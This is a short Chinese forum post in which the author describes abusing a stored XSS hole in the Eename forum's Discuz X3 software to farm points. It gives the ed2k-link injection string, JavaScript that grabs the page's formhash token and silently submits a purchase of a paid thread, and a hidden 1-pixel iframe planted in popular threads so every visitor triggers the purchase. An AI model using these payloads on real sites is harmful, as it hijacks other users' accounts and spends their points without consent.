易名中国论坛XSS漏洞可无限刷玉米

易名论坛DISCUZ X3程序，前段时间论坛爆出XSS漏洞，今天正好逛论坛就试了下，然后有了下面的刷玉米（积分）。

随便找个帖子回复，然后插入连接，为了方便后面的刷分 尽量找回复N多页的帖子，插入代码
ed2k://|file|test|'+document.write(String.fromCharCode())+'|test/

这里我插入的是自动购买主题的JS代码：

 

var vzhi =document.getElementsByName("formhash")[0].value;
document.write('<form id=payform name=payform method=post autocomplete=off action=forum.php?mod=misc&action=pay&paysubmit=yes&infloat=yes><br>')
document.write('<input type=hidden name=formhash value='+vzhi+'><br>')
document.write('<input type=hidden name=referer value=http://www.dnbbs.com/./ ><br>')
document.write('<input type=hidden name=tid value=869290><br>')
/*document.write('<input type=submit name=submit value='+vzhi+'>')*/
document.write('</form><br>')
setTimeout("document.payform.submit()",1000)

这样浏览这个帖子就会自动购买主题ID为869290的主题（主题设置收费），





然后选择热门帖子跟帖 插入另外一个

代码：

 

document.writeln("<iframe src=\"第一次回复帖子地址\" frameborder=\"0\" scrolling=\"No\" height=\"1px\" width=\"1px\"></iframe>");

然后不知不觉中主题被不断购买。。。

刚刚刷了几千分就被封了。。管理效率挺高的，赞一个。。没啥恶意啊。。。